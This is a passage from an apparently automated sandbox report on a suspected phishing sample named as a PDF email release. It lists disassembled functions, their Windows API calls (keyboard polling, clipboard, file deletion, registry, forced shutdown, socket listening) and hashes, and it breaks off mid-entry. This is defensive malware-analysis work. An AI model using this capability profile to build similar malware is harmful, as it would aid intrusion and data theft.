                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 1824444939-438819550
                                                                                                          • Opcode ID: 26b4075f1d7f236c3f3cb5dbf38b5d65f30c7e46866669a2a9bd5d5dc0847e58
                                                                                                          • Instruction ID: a679244c6031f03e2c3f47f1d6c363cce1096f4c041b37009d2379e641c79fc9
                                                                                                          • Opcode Fuzzy Hash: 26b4075f1d7f236c3f3cb5dbf38b5d65f30c7e46866669a2a9bd5d5dc0847e58
                                                                                                          • Instruction Fuzzy Hash: 5E31253650160DBADF10AFB4EC48BEE77BCAF45760F104176E854E21A0DB38DE44CA68
                                                                                                          Function 007BA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007BA20F
                                                                                                          • __swprintf.LIBCMT ref: 007BA231
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 007BA26E
                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007BA293
                                                                                                          • _memset.LIBCMT ref: 007BA2B2
                                                                                                          • _wcsncpy.LIBCMT ref: 007BA2EE
                                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007BA323
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007BA32E
                                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 007BA337
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007BA341
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                          • String ID: :$\$\??\%s
                                                                                                          • API String ID: 2733774712-3457252023
                                                                                                          • Opcode ID: 36dafd85658cb18db17eaaf34ae36e92cd1252c748fbe5cb4435904f125fce47
                                                                                                          • Instruction ID: 95db6944965e8e75eb0396c9a9221b4df609b8a825ae4cf36a2f1175ef93592b
                                                                                                          • Opcode Fuzzy Hash: 36dafd85658cb18db17eaaf34ae36e92cd1252c748fbe5cb4435904f125fce47
                                                                                                          • Instruction Fuzzy Hash: 78319EB1900109BBDB21AFA4DC49FEB37BCEF89740F1081B6F509D2160EB7896458B29
                                                                                                          Function 007666E1 Relevance: 22.1, Strings: 17, Instructions: 889COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 036210c621026210062101621086210962105621056210e6210c621086210b62104621056210f6210c621006210f6210b621076210462108621006210662103621$3cv$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_v
                                                                                                          • API String ID: 0-1346999756
                                                                                                          • Opcode ID: f92eda524497126ff5b2979bbdede9d660a0bb66d808dabdb4be46f282b2c537
                                                                                                          • Instruction ID: e7326cf34a5765e112073fa3ffcafab223da05974f253ab5e5184098948f398c
                                                                                                          • Opcode Fuzzy Hash: f92eda524497126ff5b2979bbdede9d660a0bb66d808dabdb4be46f282b2c537
                                                                                                          • Instruction Fuzzy Hash: 5F726175E00219DBEF14CF59C8407AEB7B5FF89310F54826AE94AEB291E7389D41CB90
                                                                                                          Function 007B001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 007B0097
                                                                                                          • SetKeyboardState.USER32(?), ref: 007B0102
                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 007B0122
                                                                                                          • GetKeyState.USER32(000000A0), ref: 007B0139
                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 007B0168
                                                                                                          • GetKeyState.USER32(000000A1), ref: 007B0179
                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 007B01A5
                                                                                                          • GetKeyState.USER32(00000011), ref: 007B01B3
                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 007B01DC
                                                                                                          • GetKeyState.USER32(00000012), ref: 007B01EA
                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 007B0213
                                                                                                          • GetKeyState.USER32(0000005B), ref: 007B0221
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$Async$Keyboard
                                                                                                          • String ID:
                                                                                                          • API String ID: 541375521-0
                                                                                                          • Opcode ID: 481b3e5c3c5be9d55598ea0ce36828777a88ad75917729f8d64ce8f0b343a12b
                                                                                                          • Instruction ID: d13c83a4fe4f8c74eb75a5b81a70656f3bdda1aadd0bab617e715544dd17bd92
                                                                                                          • Opcode Fuzzy Hash: 481b3e5c3c5be9d55598ea0ce36828777a88ad75917729f8d64ce8f0b343a12b
                                                                                                          • Instruction Fuzzy Hash: C351C92090478C69FB35EBA488587EFBFB49F01380F48459AD5C2575C2DAAC9B8CC7E1
                                                                                                          Function 007D03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 007D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007CFDAD,?,?), ref: 007D0E31
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D04AC
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007D054B
                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007D05E3
                                                                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007D0822
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 007D082F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 1240663315-0
                                                                                                          • Opcode ID: 306a709463ffb292cc1a661cb16467294613724d938119a96320f2b909a10369
                                                                                                          • Instruction ID: 8e8ae84af5cb55bcd9a85e1cbfe72d093dfe3b808bed182050b19b4ba106ffad
                                                                                                          • Opcode Fuzzy Hash: 306a709463ffb292cc1a661cb16467294613724d938119a96320f2b909a10369
                                                                                                          • Instruction Fuzzy Hash: 77E13B71604204EFCB14DF24C895E6ABBF5EF89314F04856EF94ADB261DA38E905CB92
                                                                                                          Function 007C83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                          • CoInitialize.OLE32 ref: 007C8403
                                                                                                          • CoUninitialize.OLE32 ref: 007C840E
                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,007E2BEC,?), ref: 007C846E
                                                                                                          • IIDFromString.OLE32(?,?), ref: 007C84E1
                                                                                                          • VariantInit.OLEAUT32(?), ref: 007C857B
                                                                                                          • VariantClear.OLEAUT32(?), ref: 007C85DC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                          • API String ID: 834269672-1287834457
                                                                                                          • Opcode ID: e8336fd29cc17e0f05b2c75bba61ed771ada34553a3304abbe54039f40d98155
                                                                                                          • Instruction ID: 2b0a58ff7ab2ecd74843f1948bbd92937a826c8320b134c48bc0345318d029a2
                                                                                                          • Opcode Fuzzy Hash: e8336fd29cc17e0f05b2c75bba61ed771ada34553a3304abbe54039f40d98155
                                                                                                          • Instruction Fuzzy Hash: 89616970608212DFC754DF24D848F5AB7E8AF49754F04441DF9869B291CBB8EE48CB93
                                                                                                          Function 007C4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1737998785-0
                                                                                                          • Opcode ID: c6f5e1b8c7ba3da390a8d39caa4a390d30f136d458267cde2b16c813efc1539a
                                                                                                          • Instruction ID: 1e588755c64c4d231f7cc55065ef5764499ab4b40681023c41a5d119d27daf29
                                                                                                          • Opcode Fuzzy Hash: c6f5e1b8c7ba3da390a8d39caa4a390d30f136d458267cde2b16c813efc1539a
                                                                                                          • Instruction Fuzzy Hash: 03217A35201214DFDB10AF24EC19B6E7BB8FF45721F18C02AF9469B2A1DB78E9008B58
                                                                                                          Function 007B37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00754750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00754743,?,?,007537AE,?), ref: 00754770
                                                                                                            • Part of subcall function 007B4A31: GetFileAttributesW.KERNEL32(?,007B370B), ref: 007B4A32
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 007B38A3
                                                                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 007B394B
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 007B395E
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007B397B
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 007B399D
                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 007B39B9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 4002782344-1173974218
                                                                                                          • Opcode ID: 0d6474eaec469b7df43489f522cd8e1ff03390093b53299201ba4b008f9dfd27
                                                                                                          • Instruction ID: ad83efc730a872e3907d292241f46029979fda1e90337caabcaf4eab239140aa
                                                                                                          • Opcode Fuzzy Hash: 0d6474eaec469b7df43489f522cd8e1ff03390093b53299201ba4b008f9dfd27
                                                                                                          • Instruction Fuzzy Hash: 39518F3180514CEACF05EBA0D996AFDB778AF14305F604069E806B71A2EF796F4DCB61
                                                                                                          Function 007BF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007BF440
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 007BF470
                                                                                                          • _wcscmp.LIBCMT ref: 007BF484
                                                                                                          • _wcscmp.LIBCMT ref: 007BF49F
                                                                                                          • FindNextFileW.KERNEL32(?,?), ref: 007BF53D
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BF553
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 713712311-438819550
                                                                                                          • Opcode ID: 311c47a1a52dde2019cd0a9861bbba8b4184fe867341b87161f9b697334107df
                                                                                                          • Instruction ID: 1f719cb5c8d76e43bff099f5b773c2b211cbf0aa62fa66d58eab9c1cb704d899
                                                                                                          • Opcode Fuzzy Hash: 311c47a1a52dde2019cd0a9861bbba8b4184fe867341b87161f9b697334107df
                                                                                                          • Instruction Fuzzy Hash: 67415C7190021AEFCF14EF64DC49BEEBBB8FF05710F144566E855A3291DB389A94CB60
                                                                                                          Function 00763030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __itow__swprintf
                                                                                                          • String ID: 3cv$_v
                                                                                                          • API String ID: 674341424-436345795
                                                                                                          • Opcode ID: eef835452a597df841d85b360b9e43034128c3a97d610cc7df47b0d5fbb63380
                                                                                                          • Instruction ID: 78a3d1084299a04db56083b9b88bfcd635f98b64b061fddbdb0fcee73c9deb25
                                                                                                          • Opcode Fuzzy Hash: eef835452a597df841d85b360b9e43034128c3a97d610cc7df47b0d5fbb63380
                                                                                                          • Instruction Fuzzy Hash: AC22BE71608340DFDB24DF24D885BAEB7E5BF85700F004A1DF99A97291DB79E908CB92
                                                                                                          Function 00765760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104443479-0
                                                                                                          • Opcode ID: df82a9af2e8cc5fbf876eceb4942a2700247a413e2fb0da359e790e0068e95d3
                                                                                                          • Instruction ID: 84c09be4c4ceef14fb8eb7d0720819716963dcfc9935362d5fca9f316628607e
                                                                                                          • Opcode Fuzzy Hash: df82a9af2e8cc5fbf876eceb4942a2700247a413e2fb0da359e790e0068e95d3
                                                                                                          • Instruction Fuzzy Hash: 73129B70A00609DFDF04DFA5D985AEEB7F5FF48300F108629E806A7251EB79AD14DB91
                                                                                                          Function 007B3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00754750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00754743,?,?,007537AE,?), ref: 00754770
                                                                                                            • Part of subcall function 007B4A31: GetFileAttributesW.KERNEL32(?,007B370B), ref: 007B4A32
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 007B3B89
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 007B3BD9
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 007B3BEA
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007B3C01
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007B3C0A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 2649000838-1173974218
                                                                                                          • Opcode ID: e5b2ff01a0abb63194182e7b9cb773248346fce217be1dab0e46de783e99658b
                                                                                                          • Instruction ID: cd4840fa739c3cf8125e0b82a63a0d1ac3ea1c94f19cdd0c6fff30b31f0efb2e
                                                                                                          • Opcode Fuzzy Hash: e5b2ff01a0abb63194182e7b9cb773248346fce217be1dab0e46de783e99658b
                                                                                                          • Instruction Fuzzy Hash: 89319071009384DFC304EF64D8999EFBBA8BE91305F404E2DF8D5921A1EB699A0CC767
                                                                                                          Function 007B51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 007A87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A882B
                                                                                                            • Part of subcall function 007A87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8858
                                                                                                            • Part of subcall function 007A87E1: GetLastError.KERNEL32 ref: 007A8865
                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 007B51F9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                          • String ID: $@$SeShutdownPrivilege
                                                                                                          • API String ID: 2234035333-194228
                                                                                                          • Opcode ID: 8f49da3a4a5d32fabebe98b7a6842613e1be160e41b63053c9d00f6e26dbfcb9
                                                                                                          • Instruction ID: e59b39be95379b7d6f0761f34ddf0ca0c62693c9294c0fd9d60af03f3fac65c3
                                                                                                          • Opcode Fuzzy Hash: 8f49da3a4a5d32fabebe98b7a6842613e1be160e41b63053c9d00f6e26dbfcb9
                                                                                                          • Instruction Fuzzy Hash: 4101F2B1793615ABE7286268AC8BFFA7368FB05340F240525F953E20D2DA7D1C0086A4
                                                                                                          Function 007C6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007C62DC
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 007C62EB
                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 007C6307
                                                                                                          • listen.WSOCK32(00000000,00000005), ref: 007C6316
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 007C6330
                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 007C6344
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279440585-0
                                                                                                          • Opcode ID: 94341efd229e89a48fae0c93de7290328efa922188e5b1b1e6193056ff2fcd9c
                                                                                                          • Instruction ID: a225360485359f7f20ae793f54fe87ce6542110982a190b85679fb85181b8fcf
